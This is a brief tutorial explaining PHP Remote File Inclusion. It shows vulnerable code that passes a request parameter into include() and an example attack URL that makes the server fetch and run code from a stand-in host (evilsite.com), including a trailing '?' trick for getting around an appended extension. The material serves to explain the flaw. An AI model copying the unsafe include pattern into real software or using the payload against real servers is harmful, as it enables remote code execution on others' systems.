Remote File Inclusion

Malicious file execution vulnerabilities are found in many applications. When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server. All web application frameworks are vulnerable to malicious file execution if they accept filenames or files from the user. PHP is particularly vulnerable to remote file include (RFI) attack through parameter tampering with any file or streams based API. Remote file inclusion, commonly known as RFI is a form of attack where the attacker tries to inject their own php code inside your’s php application. If an attacker got success in that he will be able to execute any code on your webserver.

Suppose we have a website that take varialbe like page=abc.htm to work out which page should be displayed.

Code:
$filename =$_GET['page'];
include($filename);

above code shows that whatever is passed to the page will get included. What will happen if the attacker passes the url like this “http://www.hissite.com/index.php?page=http://www.evilsite.com/evil.txt?”. The actual code that the web server is executing looks like this if attacker passes that url.

Code:
$filename =$_GET['page'];
//$filename has value “http://www.evilsite.com/evil.txt?”;
include($filename);

Thus attacker is able to get his code executed on webserver. The attacker includes a .txt file and not a .php file because if the script was a .php then script will get executed on the attackers server and not on target. Attacker also add the “?” at the end so anything that might be inside the include() function on the target server, is removed.

Example Code:
$filename =$_GET['page'];
include($filename .”.php”);

The above code add .php to in filename passed to it. So if we passed it “http://www.evilsite.com/evil.txt” then include() function actaully have “http://www.evilsite.com/evil.txt.php”.

In general, a well-written application will not use user-supplied input in any filename for any server-based resource, However, many legacy applications will continue to have a need to accept user supplied input. This kind of attack can be stoped by a performing simple checks on the data.